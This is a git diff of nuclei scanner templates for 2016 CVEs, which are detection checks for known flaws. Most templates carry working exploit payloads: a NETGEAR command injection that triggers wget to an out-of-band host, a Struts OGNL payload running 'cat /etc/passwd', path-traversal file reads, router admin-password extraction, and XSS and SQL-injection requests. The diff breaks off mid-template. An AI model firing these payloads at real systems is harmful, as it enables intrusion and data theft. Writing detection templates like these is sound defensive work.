nuclei-templates/CVE-2016/cve-2016-10960.yaml rename to nuclei-templates/CVE-2016/CVE-2016-10960.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-10993.yaml b/nuclei-templates/CVE-2016/CVE-2016-10993.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-10993.yaml rename to nuclei-templates/CVE-2016/CVE-2016-10993.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1555.yaml b/nuclei-templates/CVE-2016/CVE-2016-1555.yaml deleted file mode 100644 index 0afd89e84c..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1555.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2016-1555 - -info: - name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection - author: gy741 - severity: critical - description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. - reference: - - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 - - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic - - http://seclists.org/fulldisclosure/2016/Feb/112 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2016-1555 - cwe-id: CWE-77 - tags: netgear,rce,oast,router - -requests: - - raw: - - | - POST /boardDataWW.php HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - - macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2016/CVE-2016-2389.yaml b/nuclei-templates/CVE-2016/CVE-2016-2389.yaml deleted file mode 100644 index 33b554b186..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-2389.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2016-2389 - -info: - name: SAP xMII 15.0 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978. - reference: - - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - - https://www.cvedetails.com/cve/CVE-2016-2389 - - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html - - https://www.exploit-db.com/exploits/39837/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2016-2389 - cwe-id: CWE-22 - tags: cve,cve2016,lfi,sap - -requests: - - method: GET - path: - - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-3081.yaml b/nuclei-templates/CVE-2016/CVE-2016-3081.yaml deleted file mode 100644 index 580529199e..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-3081.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2016-3081 - -info: - name: Apache S2-032 Struts RCE - author: dhiyaneshDK - severity: high - description: | - Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-032 - - https://struts.apache.org/docs/s2-032.html - - http://www.securitytracker.com/id/1035665 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 - cve-id: CVE-2016-3081 - cwe-id: CWE-77 - tags: cve,cve2016,struts,rce,apache - -requests: - - raw: - - | - GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2016/CVE-2016-3978.yaml b/nuclei-templates/CVE-2016/CVE-2016-3978.yaml index 601462cf16..9c1dd44d28 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-3978.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-3978.yaml @@ -1,29 +1,41 @@ id: CVE-2016-3978 info: - name: FortiOS (Fortinet) - Open Redirect and XSS + name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting author: 0x_Akoko severity: medium - description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login." + description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft. + remediation: | + Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. reference: - - https://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 - http://seclists.org/fulldisclosure/2016/Mar/68 - - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability + - http://www.securitytracker.com/id/1035332 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-3978 cwe-id: CWE-79 - tags: cve,cve2016,redirect,fortinet,fortios + epss-score: 0.00217 + epss-percentile: 0.59667 + cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fortinet + product: fortios + tags: cve2016,cve,redirect,fortinet,fortios,seclists -requests: +http: - method: GET path: - - '{{BaseURL}}/login?redir=http://www.example.com' + - '{{BaseURL}}/login?redir=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-4975.yaml b/nuclei-templates/CVE-2016/CVE-2016-4975.yaml new file mode 100644 index 0000000000..ad77d61eda --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-4975.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-4975 + +info: + name: Apache mod_userdir CRLF injection + author: melbadry9,nadino,xElkomy + severity: medium + description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + reference: + - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 + - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 + remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-4975 + cwe-id: CWE-93 + tags: cve,cve2016,crlf,generic,apache + +requests: + - method: GET + path: + - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' + +# Enhanced by cs on 2022/02/14 diff --git a/nuclei-templates/CVE-2016/CVE-2016-4977.yaml b/nuclei-templates/CVE-2016/CVE-2016-4977.yaml new file mode 100644 index 0000000000..48ee87dc33 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-4977.yaml @@ -0,0 +1,37 @@ +id: CVE-2016-4977 + +info: + name: Spring Security OAuth2 Remote Command Execution + author: princechaddha + severity: high + description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type. + reference: + - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md + - https://tanzu.vmware.com/security/cve-2016-4977 + - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 + - https://pivotal.io/security/cve-2016-4977 + remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2016-4977 + cwe-id: CWE-19 + tags: cve,cve2016,spring,oauth2,oauth,rce,ssti + +requests: + - method: GET + path: + - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Unsupported response types: [978015547]" + + - type: status + status: + - 400 + +# Enhanced by mp on 2022/04/04 diff --git a/nuclei-templates/CVE-2016/CVE-2016-5649.yaml b/nuclei-templates/CVE-2016/CVE-2016-5649.yaml deleted file mode 100644 index 6940b6d489..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-5649.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2016-5649 - -info: - name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure - author: suman_kar - severity: critical - description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-5649 - - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html - - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2016-5649 - cwe-id: CWE-200 - tags: cve,cve2016,iot,netgear,router - -requests: - - raw: - - | - GET /BSW_cxttongr.htm HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Smart Wizard Result " - part: body - - extractors: - - type: regex - name: password - part: body - group: 1 - regex: - - 'Success "([a-z]+)"' - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2016/CVE-2016-6210.yaml b/nuclei-templates/CVE-2016/CVE-2016-6210.yaml deleted file mode 100644 index 0cf11fcf80..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-6210.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2016-6210 -info: - name: OpenSSH username enumeration < v7.3 - author: iamthefrogy,forgedhallpass - severity: medium - tags: cve,cve2016,network,openssh - description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. - reference: - - http://seclists.org/fulldisclosure/2016/Jul/51 - - https://security-tracker.debian.org/tracker/CVE-2016-6210 - - http://openwall.com/lists/oss-security/2016/08/01/2 - - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2016-6210 - cwe-id: CWE-200 -network: - - host: - - "{{Hostname}}" - - "{{Host}}:22" - matchers: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - extractors: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' diff --git a/nuclei-templates/CVE-2016/cve-2016-6277.yaml b/nuclei-templates/CVE-2016/CVE-2016-6277.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-6277.yaml rename to nuclei-templates/CVE-2016/CVE-2016-6277.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-7552.yaml b/nuclei-templates/CVE-2016/CVE-2016-7552.yaml deleted file mode 100644 index e8000d4ef0..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-7552.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2016-7552 - -info: - name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass - author: dwisiswant0 - severity: critical - description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. - reference: - - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 - - http://www.securityfocus.com/bid/97599 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2016-7552 - cwe-id: CWE-22 - tags: cve,cve2016,lfi,auth,bypass - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/logoff.cgi" - headers: - Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Memory map" - part: body - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2016/CVE-2016-7981.yaml b/nuclei-templates/CVE-2016/CVE-2016-7981.yaml new file mode 100644 index 0000000000..645a590895 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-7981.yaml @@ -0,0 +1,40 @@ +id: CVE-2016-7981 + +info: + name: SPIP 3.1.2 XSS + author: pikpikcu + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-7981 + - https://core.spip.net/projects/spip/repository/revisions/23202 + - https://core.spip.net/projects/spip/repository/revisions/23201 + - https://core.spip.net/projects/spip/repository/revisions/23200 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-7981 + cwe-id: CWE-79 + tags: cve,cve2016,xss,spip + +requests: + - method: GET + path: + - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2016/cve-2016-8527.yaml b/nuclei-templates/CVE-2016/CVE-2016-8527.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-8527.yaml rename to nuclei-templates/CVE-2016/CVE-2016-8527.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000126.yaml b/nuclei-templates/CVE-2016/cve-2016-1000126.yaml deleted file mode 100644 index 7570661517..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-1000126.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2016-1000126 - -info: - name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 - tags: cve,cve2016,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2016-1000126 - cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000127.yaml b/nuclei-templates/CVE-2016/cve-2016-1000127.yaml deleted file mode 100644 index 51c400aa1e..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-1000127.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2016-1000127 - -info: - name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin ajax-random-post v2.00 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 - tags: cve,cve2016,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2016-1000127 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000128.yaml b/nuclei-templates/CVE-2016/cve-2016-1000128.yaml new file mode 100644 index 0000000000..9e8645e466 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000128.yaml @@ -0,0 +1,37 @@ +id: CVE-2016-1000128 + +info: + name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 + - https://wordpress.org/plugins/anti-plagiarism + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000128 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000131.yaml b/nuclei-templates/CVE-2016/cve-2016-1000131.yaml deleted file mode 100644 index f9e0d4a700..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-1000131.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2016-1000131 - -info: - name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php - author: daffainfo - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 - tags: cve,cve2016,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2016-1000131 - cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin e-search v1.0" - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000133.yaml b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml new file mode 100644 index 0000000000..64968b022f --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000133.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000133 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000137.yaml b/nuclei-templates/CVE-2016/cve-2016-1000137.yaml new file mode 100644 index 0000000000..bbfc42fdc5 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000137.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000137 + +info: + name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658 + tags: cve,cve2016,wordpress,xss,wp-plugin,maps + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000137 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0" + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000139.yaml b/nuclei-templates/CVE-2016/cve-2016-1000139.yaml new file mode 100644 index 0000000000..b3ff2bbb88 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000139.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000139 + +info: + name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS + author: daffainfo + severity: medium + reference: + - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 + tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000139 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '"><"' + - 'input type="text" name="ContactId"' + condition: and + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000148.yaml b/nuclei-templates/CVE-2016/cve-2016-1000148.yaml new file mode 100644 index 0000000000..7340d0b0c2 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000148.yaml @@ -0,0 +1,37 @@ +id: CVE-2016-1000148 + +info: + name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 + tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000148 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin s3-video v0.983" + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '<"' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000155.yaml b/nuclei-templates/CVE-2016/cve-2016-1000155.yaml new file mode 100644 index 0000000000..70f109f44c --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000155.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000155 + +info: + name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000155 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-10940.yaml b/nuclei-templates/CVE-2016/cve-2016-10940.yaml deleted file mode 100644 index 9cb20d013b..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-10940.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2016-10940 - -info: - name: WordPress zm-gallery plugin 1.0 SQL Injection - author: cckuailong,daffainfo - severity: high - description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor. - reference: - - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 - - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - - https://wordpress.org/plugins/zm-gallery/#developers - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2016-10940 - cwe-id: CWE-89 - epss-score: 0.00776 - epss-percentile: 0.80947 - cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* - metadata: - max-request: 3 - vendor: zm-gallery_project - product: zm-gallery - framework: wordpress - tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 - Host: {{Hostname}} - - | - GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc 